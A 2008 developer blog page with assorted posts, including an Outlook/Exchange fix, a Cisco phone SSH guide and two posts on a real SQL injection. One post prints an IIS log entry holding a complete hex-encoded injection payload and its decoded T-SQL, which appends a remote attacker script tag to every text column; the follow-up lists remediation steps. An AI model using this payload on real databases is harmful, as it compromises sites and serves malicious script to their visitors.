Tim

Footprints in the snow of a warped mind

Blog Home About Me Photo Album The Site Doctor Blog Feed by Email Portfolio

Tag Cloud

AJAX (4) ASP (6) ASP.Net (38) Error Reporting (2) Atlas (2) Business (61) Business Start-up Advice (24) Client (8) Expanding Your Business (15) C# (8) Canoeing (4) Canoe Racing (5) Cheshire Ring Race (5) Racing (2) Training (4) CIMA (1) Cisco (1) 7970G (1) CSS (3) dasBlog (2) Design (9) Icons (1) Development (7) General (37) Christmas (6) Fun and Games (10) Internet (18) Random (42) RX-8 (8) Home Cinema (2) Hosting (1) IIS (8) iPhone (1) JavaScript (2) Marketing (3) Multipack (1) Networking (2) Nintendo (1) OS Commerce (1) Photography (1) PHP (1) PowerShell (1) Press Release (1) Security (1) SEO (5) Server Maintenance (3) Server Management (8) Software (9) Office (4) Visual Studio (6) Windows (4) Vista (1) SQL Server (12) Testing (1) The Site Doctor (86) Turnover Challenge (1) Umbraco (10) Web Development (39) WebDD (32) Wii (1)

Atom 1.0 RSS 2.0 CDF 

Search

<May 2008>
SunMonTueWedThuFriSat
27282930123
45678910
11121314151617
18192021222324
25262728293031
1234567

Recent Comments

Total Comments: 192
View all 192 comments

Blog Archive

Various Links

Blogs I Read

 Google Blog
Official Google Webmaster Central Blog
 Matt Cutts
Gadgets, Google, and SEO
 Ol' Deano's Blog
My mate Dean's blog on my space, equally as random as mine but not off on as much of a tangent!
 Sam's Blog
Sam is one of my younger brothers studying Product Design and Manufacture at Loughborough, this is his blog :) Enjoy!

Recent Tracks

last.fm - The Social Music Revolution

Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.

newtelligence dasBlog 2.0.7226.0

Send mail to the author(s) Email Me (Tim Gaunt)

© 2008 Tim Gaunt.

Sign In

Get Windows Live Alerts

 Friday, May 30, 2008

Can't launch Outlook when switching to Exchange from POP3

Friday, May 30, 2008 8:14:36 PM (GMT Standard Time, UTC+00:00)

I've had an irritating issue for the past week or so. I used to use POP3 in Outlook however the other day I switched to the internal Exchange server and I got stuck in an eternal loop saying that Exchange needed to connect to the server to synchronise the offline files and folders -but you couldn't do that until the files were transferred.

The message looked something like this:

The set of folders cannot be opened. You must connect to Microsoft Exchange with the current profile before you can synchronise your folders with your offline folder file.

Took me a while but the fix was to remove the profile and setup the exchange inbox first:

  1. Click Start, and then click Control Panel.
  2. Click Switch to Classic View, and then double-click Mail.
  3. In the Mail Setup dialog box, click Show Profiles.
  4. On the General tab, click Prompt for a profile to be used, and then click Add.
  5. In the Profile Name box, type a descriptive name for the new e-mail profile, and then click OK.
  6. In the E-mail Accounts dialog box, click Add a new e-mail account, and then click Next.
  7. Click the appropriate server type for your new e-mail account, and then click Next.
  8. Type your account information in the required boxes, and then click Next.
  9. Click Finish, and then click OK.
Can't launch Outlook when switching to Exchange from POP3
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Office | The Site Doctor
 Thursday, May 29, 2008

A seriously elegant SQL Injection -how it was sorted

Thursday, May 29, 2008 2:32:33 PM (GMT Standard Time, UTC+00:00)

Doug Setzer posted this comment in response to my recent "A seriously elegant SQL Injection" post and I thought it may be of interest to others so have promoted it to a post...

Well, I'll step up and say that I am the "mate" who had this done.  Tim's right - *always* sanitize your inputs.  In my defence, this was a site that I inherited from a previous contractor.  I'm not entirely absent of blame, I still should have done a security sweep through the code.

I'd like to document the steps that I went through once this was identified to try and avoid this kind of thing in the future.

  1. Edit every web page that executes a query to sanitize any parameters that are passed in.  Since the site was classic ASP, I used my "SQLStringFieldValue" function:
    www.27seconds.com/kb/article_view.aspx?id=50
  2. Modify the DB user account that is used to have *read only* access to the database
  3. Modify the pages that DO write to the database to have *read/write* access to the specific tables that are being changed.  This limits the number of places that SQL Injection can occur to a smaller set than was previously possible.  I still sanitize all of my input, but I'm extra spastic in these database calls.
  4. Add database auditing (triggers writing to mirror tables with audit event indicator & date/time) to see when data changes occur.  This is still problematic with the pages that have "write" permissions to the tables, but again- that footprint is much smaller.
    My future plans are to move to a view/stored procedure based architecture.  I can then limit write permissions to just the stored procedures and read permissions to just the views.  My grand gusto plans are to move to using command objects & parameters, but I'd sooner re-write the entire site.

Although Doug's attack wasn't the same nihaorr1.com attack that's going around atm it was similar so I would imagine other's will find this useful.

It still amazes me how many developers still fail to sanitise strings, only last week I came across another site (in PHP) that was allowing simple SQL injections to be used to log into their administration system. It was down to a problem with the sanitization string, but why not at least check your site before it goes live? It takes 2 minutes and even less to fix...

For those of you who need a few pointers, there's a good discussion or two about sanitising strings on the 4 Guys From Rolla site.

A seriously elegant SQL Injection -how it was sorted
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [2]  Trackback Link
CategoriesTags: ASP | ASP.Net | C# | Development | IIS | Security | SQL Server | Web Development
 Wednesday, May 28, 2008

A seriously elegant SQL Injection

Wednesday, May 28, 2008 4:46:49 PM (GMT Standard Time, UTC+00:00)

Having been subject to a recent hack myself I can sympathise with one of my mates who had a SQL injection attack succeed on one of his sites earlier today. Admitadly mine was due to poor internal maintanence whereas this is almost a piece of art...

This is an extract from the IIS log file:

2008-05-20 21:21:28 W3SVC1 xxx.xxx.xxx.xxx POST /news_detail.asp newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0039006900350074002E0063006E002F0061002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 221.130.180.215 Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0

This works out to:

DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor
CURSOR FOR 
select
    a.name,b.name 
from
    sysobjects a,syscolumns b 
where 
    a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)

    BEGIN
        exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://hackersscriptdomain.cn/a.js></script>''')
        FETCH NEXT FROM  Table_Cursor INTO @T,@C 
    END 
CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Very nice :) (though I can't condone hacking -no matter how elegant it is!)

p.s. The moral of the story is Always sanitise your strings -it's easy!

A seriously elegant SQL Injection
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [1]  Trackback Link
CategoriesTags: Internet | SQL Server | Web Development
 Tuesday, May 27, 2008

SSH to the Cisco 7970G and set the date/time

Tuesday, May 27, 2008 9:20:21 PM (GMT Standard Time, UTC+00:00)

As everything so far with getting the Cisco's 7970G to work on a SIP provider has been a nightmare, I thought I would share a few of my experiences. Sometimes it's the little things that make the biggest difference so this is how you correct the date and time!

Setting the Cisco 7970G's time is actually pretty simple:

  1. Download putty.exe and puttygen.exe from the putty download page
  2. Generate a key using puttygen.exe
  3. Update the "Key Comment" value to default@cisco
  4. Save the public key in a text file called authorized_keys and save it in your TFTP file folder
  5. Save the private key in your TFTP file folder
  6. Run putty.exe
  7. Enter your phone's IP in the "Host Name" box
  8. Go to Connection --> SSH --> Auth and click the "Browse" button and select your private key file (in your TFTP folder)
  9. Go to Connection --> Data and enter default under the "Auto-login username"
  10. (Optional) Save the settings in case you want to login again
  11. Click "Open" at the bottom of putty.exe to start the session
  12. Login using the username default and password user
  13. At the command prompt, type: /bin/date yyyyMMddhhmm (replacing the letters for the respective values)

Dependant on which firmware version your phone is running, the date/time might need to be in CST. If you're like me and in GMT this time website is pretty useful to keep in touch with things time wise.

When I moved the phone to 8.3.4 SR1 I found that the phone was (finally) pulling through the date/time setting correctly so I didn't need to use CST anymore. I've also set the NTP values which should automatically set the date/time which seems to be working on my phones but I've heard reports that it's not on others...

SSH to the Cisco 7970G and set the date/time
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Cisco | 7970G
 Friday, May 23, 2008

The Site Doctor stressballs have arrived!

Friday, May 23, 2008 2:24:53 PM (GMT Standard Time, UTC+00:00)

Exciting times as all our hard work is finally coming to fruition -our branded stressballs have arrived and they look AWESOME! I really couldn't have hoped for a better looking outcome if I had tried, they're unbelievably cool (that or I'm unbelievably sad!) but take a look for yourself and see what you think! (You'll have to excuse the photography)

They were delivered in a massive box -I don't think I've seen so many pills before! All exciting...

The Site Doctor stressballs have arrived!
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Business | Marketing | The Site Doctor
 Tuesday, May 20, 2008

Taking the stress out of web design with The Site Doctor's new marketing "gimmick"

Tuesday, May 20, 2008 6:08:54 AM (GMT Standard Time, UTC+00:00)

So the logo and new website was complete, next we needed a marketing gimmick and a way to promote our services. We already had an idea of how we were going to promote ourselves but we needed a way of making it stand out.

We needed something that fitted with our new pill shaped logo but what? A label on some wine? Coloured TicTacs? Pens, Badges, Stickers...? They'd all been done before 101 times and we wanted to be different.

After banging heads together for a while it struck me, the perfect "gimmick" to go with our new brand identity had been around for years -in fact I got the inspiration from my mum who was a GP in Plymouth for many years. As a kid, I remember when she came home after a medical convention with hundreds of freebies including pens, post-its and calculators, but the one that got me thinking was the stressballs. She used to get pill shaped stress balls... What could be more perfect I ask you?

It sounds silly but getting a Red and White coloured stressball wasn't easy, I called around tens if not hundreds of suppliers, all of whom were able to supply us with Orange/White or Blue/White or All White stressballs but Red/White would take weeks to manufacture. The problem it turns out is that nearly all stressballs are made in China and there is only a single UK importer who all agents buy off. That combined with the Chinese new year made lead times grow exponentially.

Thanks to the wonderful power of Google, we did manage to find a supplier (in the UK no less) that was able to custom print the stressballs so watch this space for the outcome!
Taking the stress out of web design with The Site Doctor's new marketing "gimmick"
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [1]  Trackback Link
CategoriesTags: Expanding Your Business | The Site Doctor
 Saturday, May 17, 2008

Has the apprentice been nailed to the floor?

Saturday, May 17, 2008 4:55:43 PM (GMT Standard Time, UTC+00:00)

I've watched pretty much every series of The Apprentice (the UK version with Sir Alan Sugar) and to an extent have enjoyed them all. I've got a horrible feeling that The Apprentice is going down the same route that Dragons Den and Big Brother seemed to take -that is getting contestants that are more interested in controversy and fame than anything else.

What I don't like about this current series is that there doesn't seem to be any form of comradery among the contestants, all of whom seem to be overly cut-throat and self-absorbed, this is of course to be expected in any competition but at times it's a little OTT.

I can't remember which episode it was but recently I was amazed that ?Claire refused to help the project manager with the pitch. Ok I completely agree that he should have asked her to do it in the first place but that could easily be put down to big headedness or stubbornness, surely she wants the team to have the best chance at winning?

What's worse is that seems to be playing the TV game not the business game, not firing clearly incompetent candidates and instead keeping them in and teaming them up with their nemesis'. that was clear from almost the first episode which IMNSHO detracts massively from what the show is about.

Putting the rivalry aside for a moment, what's even more concerning is the quality of the candidates. I know a few people have blogged about how stupid some of them are and mocked how they're surely not Britain's best business minds (ignoring the fact that if they were Britain's best then why on earth are they going for a job only paying £100k) but come on! I'm not the sharpest tool in the toolbox but even I know that sending cards to "save the environment" is a ludicrous idea and don't even get me started on getting some guy down the market to "bless" a chicken...

Personally, I feel that Sir Alan (who appears to have come the government's entrepreneur advisor) is setting an extremely bad example for how to do business (and I've felt that from previous episodes where he criticises the losing team for not blagging something for free -ok you can do it a couple of times, but blagging won't really create a sustainable business). Sadly, this mix of candidates really doesn't do anything to improve that opinion, it'll be interesting to see how things pan out...

Has the apprentice been nailed to the floor?
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [1]  Trackback Link
CategoriesTags: Business
 Wednesday, May 14, 2008

Native client cannot be found while installing SQL Server 64

Wednesday, May 14, 2008 8:03:44 PM (GMT Standard Time, UTC+00:00)

We're having fun and games with the new internal dev server. We've got for Windows Server 2008 x64 for a laugh and today was a corker, while trying to install SQL Server 2005 x64 onto the box we repeatedly got an error along the lines of "native client cannot be found sqlncli_x64.msi".

Searching around the install DVD/files didn't reveal anything useful, turns out (after a little Googeling) that Microsoft install the wrong version of the SQL Server Native client tools as part of the prerequisites -instead of the 64bit version you'd expect, they go and install the 32bit which then makes the rest of the installer complain...

Classic! Anyway, thanks to Eric Falsken for the heads up on that error...

Native client cannot be found while installing SQL Server 64
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Windows | SQL Server | The Site Doctor
Template based on a design by Arcsin. Valid CSS & XHTML.